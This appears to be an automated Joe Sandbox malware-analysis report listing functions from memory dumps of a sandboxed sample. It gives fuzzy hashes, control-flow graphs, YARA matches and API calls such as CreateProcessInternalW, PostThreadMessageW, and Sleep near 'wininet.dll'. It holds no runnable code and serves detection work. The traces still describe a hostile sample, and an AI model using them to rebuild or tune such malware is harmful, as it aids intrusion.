                                                        Function 02D42BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 77cee88308ed050eafdcc4a64823dd485b3e6b4f246b5fb5f438d385781c9b1c
                                                        • Instruction ID: b0c549278175b5e6c3b595f0f808145b3ad20646f737e822292d3757f21ad3e7
                                                        • Opcode Fuzzy Hash: 77cee88308ed050eafdcc4a64823dd485b3e6b4f246b5fb5f438d385781c9b1c
                                                        • Instruction Fuzzy Hash: 6190023160941802D65071584414747000587D0301F55C011B4028774D87958F957AA1
                                                        Function 02D42B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2832ab345c7bb37d80da122354320c14c97fbc3445c0df17234a9bb5bfb4294e
                                                        • Instruction ID: f9589adc2ae856012a8325e8a2ef09f4fb5829cfa5def46800abc27881ab83ca
                                                        • Opcode Fuzzy Hash: 2832ab345c7bb37d80da122354320c14c97fbc3445c0df17234a9bb5bfb4294e
                                                        • Instruction Fuzzy Hash: CB90026120641003460571584414617400A87E0201B55C021F50186B0DC5658DD17525
                                                        Function 02D42EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 66551d2756234cd015a6e304372f1371259bc59d485b1d0d7a0c41d1c409a4e0
                                                        • Instruction ID: 02f9c8de9f9d12196a1af42e082ef54823302b95a2537d6c1ca66f3f8f8dcf41
                                                        • Opcode Fuzzy Hash: 66551d2756234cd015a6e304372f1371259bc59d485b1d0d7a0c41d1c409a4e0
                                                        • Instruction Fuzzy Hash: 8E90026120581403D64075584804607000587D0302F55C011B6068675E8A698D917535
                                                        Function 02D42E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f672cc44561e40f4d3de84df2e6572a6a73c6aad4e6d9ee81c920b5e6b10a510
                                                        • Instruction ID: 603140d49c61f0040e258042b08ebd9adc6a2c1a2efdba25af0d7e3b0f225e29
                                                        • Opcode Fuzzy Hash: f672cc44561e40f4d3de84df2e6572a6a73c6aad4e6d9ee81c920b5e6b10a510
                                                        • Instruction Fuzzy Hash: F390022160541502D60171584404617000A87D0241F95C022B5028675ECA658ED2B531
                                                        Function 02D42FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: fe44b4fa56d98218db91432a2e99cb56a40adeac5c462f1fa8cf1ddc5221a3f8
                                                        • Instruction ID: d02f6407626892903626417e7ac6c130ce31db8e35a84a6b4b6345a9f458f2b4
                                                        • Opcode Fuzzy Hash: fe44b4fa56d98218db91432a2e99cb56a40adeac5c462f1fa8cf1ddc5221a3f8
                                                        • Instruction Fuzzy Hash: BD900221215C1042D70075684C14B07000587D0303F55C115B4158674CC9558DA16921
                                                        Function 02D42FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b437b20381b452aacd1e2906475471946a9a53caf27f3a4460decd8534bf93e5
                                                        • Instruction ID: a3a5dba3ea006bb238fb2f5399bf00001470e821266f148dfd28afec661086a5
                                                        • Opcode Fuzzy Hash: b437b20381b452aacd1e2906475471946a9a53caf27f3a4460decd8534bf93e5
                                                        • Instruction Fuzzy Hash: D1900221605410424640716888449074005ABE1211755C121B499C670D85998DA56A65
                                                        Function 02D42F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9371825fd1a7ce6d811ce43193e56c8b2fc6948d837c41d28e0a21a44d7bb7eb
                                                        • Instruction ID: a07d3f86c72879873b7b74d59e79ce0c977ed8cb8d12b61064acccec3b01a41e
                                                        • Opcode Fuzzy Hash: 9371825fd1a7ce6d811ce43193e56c8b2fc6948d837c41d28e0a21a44d7bb7eb
                                                        • Instruction Fuzzy Hash: A790026134541442D60071584414B070005C7E1301F55C015F5068674D8659CD927526
                                                        Function 02D42CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8f88304f5077722e096e269bc4acf1495483af360050b0f1d5b15503434d7b4e
                                                        • Instruction ID: 0ebd36547ef6ef817818d2419c485fb04466db6c1c7336e13dc2ae1432214cb3
                                                        • Opcode Fuzzy Hash: 8f88304f5077722e096e269bc4acf1495483af360050b0f1d5b15503434d7b4e
                                                        • Instruction Fuzzy Hash: 7D90023120541402D60075985408647000587E0301F55D011B9028675EC6A58DD17531
                                                        Function 02D42C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: be3c547567b1ebcdc2d0a5388873171ebb7a80f02c6aa29760c68c391a8e8260
                                                        • Instruction ID: 9a490e003637d47e766aae449772d74698e4c9be368d248140789cdbdbf19a9b
                                                        • Opcode Fuzzy Hash: be3c547567b1ebcdc2d0a5388873171ebb7a80f02c6aa29760c68c391a8e8260
                                                        • Instruction Fuzzy Hash: 9490023120549802D6107158840474B000587D0301F59C411B8428778D86D58DD17521
                                                        Function 02D42C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 156c68670650f9c4d2697b59ab4e316a8cd837cbec4910b991b9ad66a7e6f129
                                                        • Instruction ID: 2a3393c0fe4c0394fe252dbbae742f0afb424e80a835388ab3571a5e1a3aa97b
                                                        • Opcode Fuzzy Hash: 156c68670650f9c4d2697b59ab4e316a8cd837cbec4910b991b9ad66a7e6f129
                                                        • Instruction Fuzzy Hash: E690023120541842D60071584404B47000587E0301F55C016B4128774D8655CD917921
                                                        Function 02D42DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 61f66ce758b59145f8507758eec223b4a94ffab668c5b73935d7a4d7c5f5c898
                                                        • Instruction ID: 785a58c25bc31000a8a12d54e956d92438f3e7bcf9fae7b2ff809259533babeb
                                                        • Opcode Fuzzy Hash: 61f66ce758b59145f8507758eec223b4a94ffab668c5b73935d7a4d7c5f5c898
                                                        • Instruction Fuzzy Hash: 27900221246451525A45B1584404507400697E0241795C012B5418A70C85669D96EA21
                                                        Function 02D42DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ef747cf55577b47344e4281ae809eca716504e1d96d8c4c4d9bd4fffa6706ee0
                                                        • Instruction ID: f62cb847c35aad39703c9322179a3fe40ccf35896a6957f24d4332d620f1977c
                                                        • Opcode Fuzzy Hash: ef747cf55577b47344e4281ae809eca716504e1d96d8c4c4d9bd4fffa6706ee0
                                                        • Instruction Fuzzy Hash: FB90023120541413D61171584504707000987D0241F95C412B4428678D96968E92B521
                                                        Function 02D42D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 527d82ab832852235de47d6088a1390f4c79227928c3fb56a4379a6db53f4d4f
                                                        • Instruction ID: 9b5504d53545e0e603ee67d20fa26eb5b28ff07fa0d2a548261e511e5f800b25
                                                        • Opcode Fuzzy Hash: 527d82ab832852235de47d6088a1390f4c79227928c3fb56a4379a6db53f4d4f
                                                        • Instruction Fuzzy Hash: 7890022921741002D6807158540860B000587D1202F95D415B4019678CC9558DA96721
                                                        Function 02D42D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 41906f5a931a2565f9ca9a91af91ce9750374f2357145bda426da1cfb789fe10
                                                        • Instruction ID: 6f03a130e82e8183330dc0e540cdccf100ec4309ea107f607b304e488df82fe0
                                                        • Opcode Fuzzy Hash: 41906f5a931a2565f9ca9a91af91ce9750374f2357145bda426da1cfb789fe10
                                                        • Instruction Fuzzy Hash: 8D90022130541003D640715854186074005D7E1301F55D011F4418674CD9558D966622
                                                        Function 02D435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: bd6feedb8e193891b1ed95d6ed1fc6892202b7a20a4ed309a57df9aa9e5a29aa
                                                        • Instruction ID: 786518453f9904c92dfd73c4aac688e1cb04b49a7aa7f943c661a4f70bedd9a2
                                                        • Opcode Fuzzy Hash: bd6feedb8e193891b1ed95d6ed1fc6892202b7a20a4ed309a57df9aa9e5a29aa
                                                        • Instruction Fuzzy Hash: 7C90023160951402D60071584514707100587D0201F65C411B4428678D87D58E9179A2
                                                        Function 02D439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 855b4d04232f32247d611784726ecaad1e0e462aedfe9c7d1c833ea3d6fe3eea
                                                        • Instruction ID: 5965d4f699ec9768ece593ebe2e2858ab23448fe760628e9945528b1dbc76753
                                                        • Opcode Fuzzy Hash: 855b4d04232f32247d611784726ecaad1e0e462aedfe9c7d1c833ea3d6fe3eea
                                                        • Instruction Fuzzy Hash: 2F90022124946102D650715C44046174005A7E0201F55C021B48186B4D85958D957621
                                                        Function 003A0A80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 503 3a0a80-3a0aa7 504 3a0aa9-3a0ad0 503->504 505 3a0ad6-3a0adb 503->505 504->505 506 3a0add-3a0ae5 505->506 507 3a0b04-3a0b1d 505->507 509 3a0b1f-3a0b27 507->509 510 3a0b32-3a0b37 507->510 511 3a0b29 509->511 512 3a0b6c-3a0b89 call 3a4530 call 391410 call 3b13c0 509->512 513 3a0b2b-3a0b2e 511->513 514 3a0ba4-3a0baa 511->514 516 3a0b8e-3a0ba1 512->516 513->516 517 3a0b30-3a0b31 513->517 519 3a0bca-3a0bd0 514->519 520 3a0bac-3a0bbb PostThreadMessageW 514->520 516->514 517->510 520->519 522 3a0bbd-3a0bc7 520->522 522->519
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 0-4090662830
                                                        • Opcode ID: ff9af6df1f208d3f69c87da5382ceb7ac78d7d18d4b4b88facc16dc1376e12d3
                                                        • Instruction ID: bb00e4667660ddfea4db1b7d7f08b279a735cafe8e5aefcc8deaded633ebb9fd
                                                        • Opcode Fuzzy Hash: ff9af6df1f208d3f69c87da5382ceb7ac78d7d18d4b4b88facc16dc1376e12d3
                                                        • Instruction Fuzzy Hash: 6E21FE32A01349ABDB26DFA4DCC18EEF768DF87328B000588F855AF141E7305E12C7A2
                                                        Function 003A0B40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 525 3a0b40-3a0b52 526 3a0b5a-3a0baa call 3baae0 call 3a4530 call 391410 call 3b13c0 525->526 527 3a0b55 call 3ba0d0 525->527 538 3a0bca-3a0bd0 526->538 539 3a0bac-3a0bbb PostThreadMessageW 526->539 527->526 539->538 540 3a0bbd-3a0bc7 539->540 540->538
                                                        APIs
                                                        • PostThreadMessageW.USER32(410-3696,00000111,00000000,00000000), ref: 003A0BB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 1836367815-4090662830
                                                        • Opcode ID: 26ed65f4ef732d2af6c9ab9270221f64b5bf159a6dfb4cfc90b4c0a8629c239f
                                                        • Instruction ID: 46111ca26d9d02b3624823ca745cd8e62c286f3627ff14ed52cd6cd26c51aab0
                                                        • Opcode Fuzzy Hash: 26ed65f4ef732d2af6c9ab9270221f64b5bf159a6dfb4cfc90b4c0a8629c239f
                                                        • Instruction Fuzzy Hash: EC01B9B2D0125C7AEB11ABE58C82DEF7B7CDF45798F058064FA047B241E6745E068BB2
                                                        Function 003A0B42 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 541 3a0b42-3a0baa call 3ba0d0 call 3baae0 call 3a4530 call 391410 call 3b13c0 554 3a0bca-3a0bd0 541->554 555 3a0bac-3a0bbb PostThreadMessageW 541->555 555->554 556 3a0bbd-3a0bc7 555->556 556->554
                                                        APIs
                                                        • PostThreadMessageW.USER32(410-3696,00000111,00000000,00000000), ref: 003A0BB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 1836367815-4090662830
                                                        • Opcode ID: 471f166a55a21dde9bc80699925a764ef9f7e34c17ceaa330df7108b7873e4ca
                                                        • Instruction ID: c8be363a5fa2cde56d662999a03b53c3f288425253e10d40b07878853e017b88
                                                        • Opcode Fuzzy Hash: 471f166a55a21dde9bc80699925a764ef9f7e34c17ceaa330df7108b7873e4ca
                                                        • Instruction Fuzzy Hash: F40196B2D0115C7AEB11ABE58C81DEF7B7CDF46798F058064FA04BB141D6645E068BB2
                                                        Function 003B2CA0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 003B2D6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: b9edf7ec0d3bfc0d1d05097432b2788b0d48ffc6f7084cba6357204f1647bf64
                                                        • Instruction ID: 70a3855019f8c17d434600f3afdb768e56e22e0cc331530236df9d428ab04bf1
                                                        • Opcode Fuzzy Hash: b9edf7ec0d3bfc0d1d05097432b2788b0d48ffc6f7084cba6357204f1647bf64
                                                        • Instruction Fuzzy Hash: 0231ADB1601705BBD715DF64C881FE7BBB8BB88708F00862DFA596B245D770B640CBA1
                                                        Function 003B8550 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,3~:,00000010,?,?,?,00000044,?,00000010,003A7E33,?,?,?), ref: 003B85B3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID: 3~:
                                                        • API String ID: 2186235152-2933657361
                                                        • Opcode ID: 974e801b870ae4abe1b0121412e705e479012fffcee78819c6d6628ef39ac235
                                                        • Instruction ID: 84841f40f0bb73d7537a6dee40ecbb843032c9d47aea3b4f016dc05472a01111
                                                        • Opcode Fuzzy Hash: 974e801b870ae4abe1b0121412e705e479012fffcee78819c6d6628ef39ac235
                                                        • Instruction Fuzzy Hash: D9017EB2215149BBDB44DE99DC81EEB77ADAB8C754F418208BA09A7241D630F851CBA8
                                                        Function 003AED05 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 003AED27
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID: @J7<
                                                        • API String ID: 2538663250-2016760708
                                                        • Opcode ID: c997e9661e9f2485e92402bb6b516759b81d540d3094fe66630f71f62a67d95e
                                                        • Instruction ID: 0184554bcc8921479e36cd54768a360f989910672acb2c8959ff9a8d6d9918e7
                                                        • Opcode Fuzzy Hash: c997e9661e9f2485e92402bb6b516759b81d540d3094fe66630f71f62a67d95e
                                                        • Instruction Fuzzy Hash: 86314FB5A0060AAFDB11DFD8C8809EEB7B9FF89304B108559E515EB314D771EE05CBA0
                                                        Function 003AED10 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 003AED27
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
